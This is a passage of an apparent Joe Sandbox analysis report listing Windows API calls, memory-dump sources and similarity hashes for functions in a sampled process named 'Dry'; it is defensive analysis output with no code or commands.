  • Part of subcall function 00B13B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B06A79,?,0000015D,?,?,?,?,00B085B0,000000FF,00000000,?,?), ref: 00B13BC5
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B1D18F
• _free.LIBCMT ref: 00B1D1A2
                                                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B1D1B1
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 64698b3b84f5a543e179bff72a200ad3bbce0f9a076fbcff73ab27f7fc349568
                                                                                                                                                                                                                                                                                    • Instruction ID: 95c0815911f5e32e7ec5ee7d5d25cfd43cd4f39b84d61070fbaec4301872c80e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64698b3b84f5a543e179bff72a200ad3bbce0f9a076fbcff73ab27f7fc349568
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F601D4736056157F332127769C8CDBB6AFDDEC2BA139501A9FC08E7244EE608D9181B0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _memcmp
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2931989736-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ba308fd3fc44ca1de4ab0a6a8a20d8eb6aa8e908d471dbee61752eb038141874
                                                                                                                                                                                                                                                                                    • Instruction ID: d8a70efdb3795e825191a65e3386b15de498ca3e8da1432ad94dd4b07c4afc46
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba308fd3fc44ca1de4ab0a6a8a20d8eb6aa8e908d471dbee61752eb038141874
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3301B9E2600305BBD71476149CC2F6B73DDDE52398F0044A5FE059A351E761EE14D2A2
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(0000000A,?,?,00B0F64E,00B0545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00B13170
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B131A5
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B131CC
                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00B131D9
                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00B131E2
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                    • Opcode ID: f1a1807c782e4cbba320b46667845f24a998d313fb8a367e650db9a56b7f91a9
                                                                                                                                                                                                                                                                                    • Instruction ID: 4e72cb6c1f1560cc797278cf522e9d668d52bc043adacbf5ca2b23749b41449e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1a1807c782e4cbba320b46667845f24a998d313fb8a367e650db9a56b7f91a9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B801F9726406007B96122734AC86EEB26E9DFD1FB17A104F9F819F3191FF618BE14110
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B40831,80070057,?,?,?,00B40C4E), ref: 00B4091B
                                                                                                                                                                                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B40831,80070057,?,?), ref: 00B40936
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B40831,80070057,?,?), ref: 00B40944
                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B40831,80070057,?), ref: 00B40954
                                                                                                                                                                                                                                                                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B40831,80070057,?,?), ref: 00B40960
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3897988419-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 1ad4ffd7600f04d658ac0b111efe356fca45a5e2f7c80653b786db32017d909c
                                                                                                                                                                                                                                                                                    • Instruction ID: f5d9f999b94ed181312f090e324ac03317d524e153659b05fe31f41ae99341bd
• Opcode Fuzzy Hash: 1ad4ffd7600f04d658ac0b111efe356fca45a5e2f7c80653b786db32017d909c
• Instruction Fuzzy Hash: A5018F72610204AFEB105F59DC48B9A7AFDEF84791F144164FE09E7211DB71DE80ABA0
APIs
• QueryPerformanceCounter.KERNEL32(?), ref: 00B4F2AE
• QueryPerformanceFrequency.KERNEL32(?), ref: 00B4F2BC
• Sleep.KERNEL32(00000000), ref: 00B4F2C4
• QueryPerformanceCounter.KERNEL32(?), ref: 00B4F2CE
• Sleep.KERNEL32 ref: 00B4F30A
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
• Opcode ID: f5ea051caf5ced6373346e74518da85e1880ea239b7ad81e56717494e33c8163
• Instruction ID: cb3c8d94c788570c2dcc19c6af7d89d4087c637c8d4229530edf3d9baaa07ae6
• Opcode Fuzzy Hash: f5ea051caf5ced6373346e74518da85e1880ea239b7ad81e56717494e33c8163
• Instruction Fuzzy Hash: 5C016971C0162ADBCF00AFB4E949AEEBBB8FF08710F4004A6E601B3250DF309694D7A5
APIs
• GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B41A60
• GetLastError.KERNEL32(?,00000000,00000000,?,?,00B414E7,?,?,?), ref: 00B41A6C
• GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B414E7,?,?,?), ref: 00B41A7B
• HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B414E7,?,?,?), ref: 00B41A82
• GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B41A99
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
• API String ID: 842720411-0
• Opcode ID: 973c8dc86a233ff2c06bb7ca963ec14eb68984a0f9c811e7ab32b84b8dd1f3a8
• Instruction ID: 8eec16ed750d7c5d708423d339a640e54f85e9e2b87b7ab48b7ce8b5b13d4467
• Opcode Fuzzy Hash: 973c8dc86a233ff2c06bb7ca963ec14eb68984a0f9c811e7ab32b84b8dd1f3a8
• Instruction Fuzzy Hash: BF0181B5601205BFDB114F68DC48D6A3BBDEF843E4B210454F949E7260DF31DD809A60
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B41916
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B41922
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B41931
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B41938
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B4194E
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: e6f7367119b0f36f84e9b92436a534b14702eff805ab07489e06b12a358acab3
• Instruction ID: 0e7fa1789a411376ed62c9ecda65c321eb86c0659e01f751098afb5ef9d46102
• Opcode Fuzzy Hash: e6f7367119b0f36f84e9b92436a534b14702eff805ab07489e06b12a358acab3
• Instruction Fuzzy Hash: 6DF06D76600302ABDB210FA9DC5DF563BBDEF897E0F510814FA49E72A0CE70DC819A60
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B41976
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B41982
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B41991
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B41998
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B419AE
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: ba5993ff7a985b4c0fae4047b25ce309ae8f55974820eb73868c6d42ef11a5e0
• Instruction ID: 4b4f051ba14db772ede5ce6e60112187e0e2f6119b3703ad1310b9427d4d31d8
• Opcode Fuzzy Hash: ba5993ff7a985b4c0fae4047b25ce309ae8f55974820eb73868c6d42ef11a5e0
• Instruction Fuzzy Hash: 32F06D75600301ABDB214FA8EC59F563BBDFF897A0F114814FA49D72A0CE70E9818A60
APIs
• CloseHandle.KERNEL32(?,?,?,?,00B50B24,?,00B53D41,?,00000001,00B23AF4,?), ref: 00B50CCB
• CloseHandle.KERNEL32(?,?,?,?,00B50B24,?,00B53D41,?,00000001,00B23AF4,?), ref: 00B50CD8
• CloseHandle.KERNEL32(?,?,?,?,00B50B24,?,00B53D41,?,00000001,00B23AF4,?), ref: 00B50CE5
• CloseHandle.KERNEL32(?,?,?,?,00B50B24,?,00B53D41,?,00000001,00B23AF4,?), ref: 00B50CF2
• CloseHandle.KERNEL32(?,?,?,?,00B50B24,?,00B53D41,?,00000001,00B23AF4,?), ref: 00B50CFF
• CloseHandle.KERNEL32(?,?,?,?,00B50B24,?,00B53D41,?,00000001,00B23AF4,?), ref: 00B50D0C
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e0a4dd0718059c2bded38d7be42d31f99bfdb20722c2f659a9edc704931837da
                                                                                                                                                                                                                                                                                    • Instruction ID: 2be2b6ebf208efa03ba286fe3f13d2acf4355392bbe46e9415b7ae86d80f9afd
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e0a4dd0718059c2bded38d7be42d31f99bfdb20722c2f659a9edc704931837da
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D801D072800B458FCB30AF66D980912F6F5FF503163158ABED49652921C7B0A848CE80
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00B465BF
• GetWindowTextW.USER32(00000000,?,00000100), ref: 00B465D6
• MessageBeep.USER32(00000000), ref: 00B465EE
• KillTimer.USER32(?,0000040A), ref: 00B4660A
• EndDialog.USER32(?,00000001), ref: 00B46624
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
• Opcode ID: eabf0e62dbc7c02c20daf676fac5e86ee4edf54e1b124356e6263afc86a1e818
• Instruction ID: 3314cd88ab089dd4a1774ce5d841ba34402dcbf4804eabfa69b3ce5ff785fa58
• Opcode Fuzzy Hash: eabf0e62dbc7c02c20daf676fac5e86ee4edf54e1b124356e6263afc86a1e818
• Instruction Fuzzy Hash: 9D018630500304ABEB246F10DE4EBD67BB8FF15745F000599A58A620E1DFF5AB849A52
APIs
• _free.LIBCMT ref: 00B1DAD2
  • Part of subcall function 00B12D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B1DB51,00BB1DC4,00000000,00BB1DC4,00000000,?,00B1DB78,00BB1DC4,00000007,00BB1DC4,?,00B1DF75,00BB1DC4), ref: 00B12D4E
  • Part of subcall function 00B12D38: GetLastError.KERNEL32(00BB1DC4,?,00B1DB51,00BB1DC4,00000000,00BB1DC4,00000000,?,00B1DB78,00BB1DC4,00000007,00BB1DC4,?,00B1DF75,00BB1DC4,00BB1DC4), ref: 00B12D60
• _free.LIBCMT ref: 00B1DAE4
• _free.LIBCMT ref: 00B1DAF6
• _free.LIBCMT ref: 00B1DB08
• _free.LIBCMT ref: 00B1DB1A
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 1ff5c0a76da9e8a3fd104f589a1fb085c8eb05dbdd47b437981c1b65d3fdee2e
• Instruction ID: 4bbf18f71cb63ab7cd698fcca5c73491c04c54c93e585bd5997989dd57b37d96
• Opcode Fuzzy Hash: 1ff5c0a76da9e8a3fd104f589a1fb085c8eb05dbdd47b437981c1b65d3fdee2e
• Instruction Fuzzy Hash: 72F017B2548614AB8624EB68F983C9B77EEEE097107E50CD9F00AD7901CB34FCC08A64
APIs
• _free.LIBCMT ref: 00B1262E
  • Part of subcall function 00B12D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B1DB51,00BB1DC4,00000000,00BB1DC4,00000000,?,00B1DB78,00BB1DC4,00000007,00BB1DC4,?,00B1DF75,00BB1DC4), ref: 00B12D4E
  • Part of subcall function 00B12D38: GetLastError.KERNEL32(00BB1DC4,?,00B1DB51,00BB1DC4,00000000,00BB1DC4,00000000,?,00B1DB78,00BB1DC4,00000007,00BB1DC4,?,00B1DF75,00BB1DC4,00BB1DC4), ref: 00B12D60
• _free.LIBCMT ref: 00B12640
• _free.LIBCMT ref: 00B12653
• _free.LIBCMT ref: 00B12664
• _free.LIBCMT ref: 00B12675
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: b667adb3d61199b4cfdf112df18a935c907e61d9241cf3a36ba9fa1c7a1dd65b
• Instruction ID: 4321114137c4f3936f95b31b760b77e2e319f5f2cf70554c6c5a4cc2fb0a0423
• Opcode Fuzzy Hash: b667adb3d61199b4cfdf112df18a935c907e61d9241cf3a36ba9fa1c7a1dd65b
• Instruction Fuzzy Hash: CEF0DAB18011209B8602AF58FC128983BE4FB257513850B9AF415D72B5CF754AA1EF84
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: __freea$_free
                                                                                                                                                                                                                                                                                    • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                                    • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                                                                    • Opcode ID: 0f1d6746e68e66f79b01d8ec46a8d60623e703e5cf78702cf7d39d051ed42db6
                                                                                                                                                                                                                                                                                    • Instruction ID: bd8329463542ceb0fa01f7623ea8510b52b6e5aa419c8708d47712af25b80e78
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f1d6746e68e66f79b01d8ec46a8d60623e703e5cf78702cf7d39d051ed42db6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23D1F2719102069ACB24DF6CC8957FAB7F5FF15700FA849DAE6029B294D3369DC0CBA1
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B42B1D,?,?,00000034,00000800,?,00000034), ref: 00B4BDF4
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00B430AD
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B42B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00B4BDBF
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00B4BD1C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00B42AE1,00000034,?,?,00001004,00000000,00000000), ref: 00B4BD2C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B4BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00B42AE1,00000034,?,?,00001004,00000000,00000000), ref: 00B4BD42
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B4311A
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B43167
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                                    • Opcode ID: 51b29bf9e8f723ecf45c434e718ec6435fefcb732baa8eabf12282b3bf2c4287
                                                                                                                                                                                                                                                                                    • Instruction ID: c37c1715e5a42d736332f1e178947ee85fdfbc93e92146e2c764761ca60eb509
